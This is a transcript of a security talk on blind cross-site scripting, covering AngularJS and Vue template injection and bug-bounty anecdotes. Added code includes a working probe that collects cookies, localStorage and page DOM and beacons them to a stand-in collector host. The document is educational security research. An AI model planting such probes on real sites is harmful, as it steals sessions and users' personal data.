
Getting Blindly Lucky

JR0ch17
November 01, 2020



Transcript

  1. {{ agenda }}
     • What is XSS?
     • AngularJS & Vue.js
     • Blind XSS Stories
     • Questions/Comments
  2. {{ XSS }}
     Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted websites.*
     • Malicious script
     • Types of XSS
       • Reflected
       • DOM (e.g. via postMessage() handlers)
       • Stored (Blind XSS is a variant of this type)
     * https://owasp.org/www-community/attacks/xss/
  3. {{ XSS PoCs }}
     • Typical PoCs
       • Steal CSRF tokens
       • Steal cookies (if not HttpOnly)
       • Steal localStorage and sessionStorage tokens
     • Can also be combined with CORS misconfigurations, using XHR or the Fetch API, to steal sensitive data (e.g. PII)
     • SSRF if the payload executes inside an HTML-to-PDF converter
  4. {{ AngularJS }}
     MVC client-side framework built by Google
     • XSS
       • Not the typical XSS
       • Template injection: {{7*7}} renders as 49
     https://jsfiddle.net/navb4jh3/
  5. {{ Vue.js }}
     "Progressive" MVVM client-side framework for building UIs and SPAs
     • XSS
       • Not the typical XSS
       • Template injection: {{7*7}} renders as 49
     https://jsfiddle.net/s6b3dy25/
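Why {{7*7}} turns into 49 even on a page that HTML-encodes everything (slides 4 and 5, and the HTML-context vs. template-injection distinction on slide 7): the server's encoding neutralises `<script>`, but `{{` and `}}` are not HTML-special, so a client-side framework that compiles the page text still evaluates the expression. The block below is an added example, not code from the deck or from AngularJS/Vue; `interpolate()` is a deliberately tiny stand-in for the frameworks' expression engines, and the `renderVulnerable`/`renderHardened` names are ours.

```javascript
// Added example (not from the original deck). A toy {{ }} interpolation engine
// shows the client-side template injection pattern the slides describe:
// HTML encoding stops <script>, but {{7*7}} still evaluates to 49.

// Minimal HTML encoding: the defence that stops HTML-context XSS.
function htmlEncode(s) {
  return s.replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;"
  })[c]);
}

// Toy client-side template engine: evaluates every {{ expr }} in the text
// against a scope object, as AngularJS / Vue do for elements they control.
// Real engines are far more restrictive than new Function(), but the property
// that matters here is the same: {{ and }} survive HTML encoding untouched.
function interpolate(template, scope) {
  return template.replace(/\{\{([\s\S]*?)\}\}/g, (_, expr) => {
    const fn = new Function(...Object.keys(scope), `return (${expr});`);
    return String(fn(...Object.values(scope)));
  });
}

// Vulnerable pattern: the server writes (encoded) user input straight into
// markup that the framework will compile. Encoding does not help.
function renderVulnerable(userInput, scope) {
  const serverHtml = `<div ng-app>Hello ${htmlEncode(userInput)}</div>`;
  return interpolate(serverHtml, scope);
}

// Hardened pattern: user input never becomes template text. It is placed in
// the scope and rendered through a binding, so {{ inside the data is just a
// string and is not compiled a second time.
function renderHardened(userInput, scope) {
  const serverHtml = `<div ng-app>Hello {{name}}</div>`;
  return interpolate(serverHtml, { ...scope, name: userInput });
}
```

In the real frameworks the equivalent fix is to keep untrusted text out of compiled templates entirely (bind it as data), and to mark any subtree that must contain raw user text as not-to-be-compiled: `ng-non-bindable` in AngularJS, `v-pre` in Vue.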
  6. {{ Blind XSS }}
     Variant of a Stored XSS. The payload is saved and executed in a separate part of the application (e.g. an admin panel) or in a completely different application (e.g. an internal application).
     • Tools
       • XSSHunter
       • Sleepy Puppy
       • Burp Collaborator
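What a blind XSS tool of the kind listed above actually does, as an added example that is not code from the deck or from XSSHunter / Sleepy Puppy: a stored payload loads a probe script from the tester's host; when the probe fires somewhere unexpected (admin panel, internal tool, mail system) it reports where it ran and a DOM snapshot, and the collector triages the hit. The collector URL, report fields and the sample report are assumptions constructed for this illustration.

```javascript
// Added example (not from the original deck): the two halves of a blind XSS
// probe. Field names, the collector URL and the sample report are made up.

// 1. The probe. A stored payload such as <script src="https://collector.example/p.js">
// loads this script. Whenever it executes it reports WHERE it ran, which is how
// a tester learns that a "blind" payload reached an admin panel or internal app.
function buildProbe(collectorUrl) {
  return `(function () {
  var report = {
    url: location.href,
    origin: location.origin,
    referrer: document.referrer,
    cookie: document.cookie,                 // HttpOnly cookies are not visible here
    localStorage: JSON.stringify(localStorage),
    dom: document.documentElement.outerHTML  // the captured DOM
  };
  navigator.sendBeacon(${JSON.stringify(collectorUrl)}, JSON.stringify(report));
})();`;
}

// 2. Collector-side triage of one report. It records where the payload fired,
// flags a hit on an origin other than the one where it was planted, and keeps
// only a bounded DOM excerpt: a captured page can contain other users' PII, so
// the collector should not hoard more than the tester needs to prove impact.
function triageReport(body, injectedOrigin, maxDom = 200) {
  const r = JSON.parse(body);
  const fired = new URL(r.url);
  return {
    firedAt: fired.origin + fired.pathname,
    crossApplication: fired.origin !== injectedOrigin,
    cookiesExposed: typeof r.cookie === "string" && r.cookie.length > 0,
    domExcerpt: r.dom.length > maxDom ? r.dom.slice(0, maxDom) + "..." : r.dom,
  };
}

// Constructed sample report, as a hit inside an internal admin panel might look.
const SAMPLE_REPORT = JSON.stringify({
  url: "https://admin.internal.example/tickets/42",
  origin: "https://admin.internal.example",
  referrer: "",
  cookie: "session=abc123",
  localStorage: "{}",
  dom: "<html><body><h1>Ticket #42</h1><p>Submitted via the public form</p></body></html>",
});

// Usage: the payload was planted on the public site, but fired on the admin host.
const triage = triageReport(SAMPLE_REPORT, "https://www.example.com");
console.log(triage.firedAt, "cross-application:", triage.crossApplication);
```

The `crossApplication` flag is the signal the blind XSS stories on the following slides hinge on: the payload did not fire where it was submitted, but in a different system that rendered the stored data.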
  7. {{ HackerOne Hacktivity Blind XSS Reports }}
     All blind XSS payloads from HackerOne's Hacktivity are from an HTML context (i.e. a <script> tag). Not a single one is from template injection.
  8. {{ Blind XSS Story #1 }}
     A Google search led to Apple's QuickLook feature. QuickLook is a way to preview a file to view its contents instead of having to open the file.
  9. {{ Blind XSS Story #1 }}
     When an XSS triggers with XSSHunter, it captures the DOM...
  10. {{ Blind XSS Story #1 }}
     Turns out the CSV file contained a LOT of PII...
  11. {{ Blind XSS Story #2 }}
     Someone had filed a complaint on my user!!! The complaint was forwarded as an email. The XSS triggered in the email system!